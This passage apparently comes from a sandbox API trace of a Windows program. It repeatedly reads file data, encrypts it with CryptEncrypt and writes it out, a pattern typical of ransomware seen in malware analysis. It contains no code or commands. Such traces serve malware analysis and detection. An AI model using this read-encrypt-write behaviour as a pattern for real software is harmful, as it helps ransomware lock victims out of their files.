pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.270] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.271] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.272] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.272] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.273] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.275] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.276] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.276] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.276] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.276] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.277] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.277] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.277] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.277] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.277] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.278] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.278] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.278] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.278] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.278] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] CryptEncrypt (in: hKey=0x2fb548, 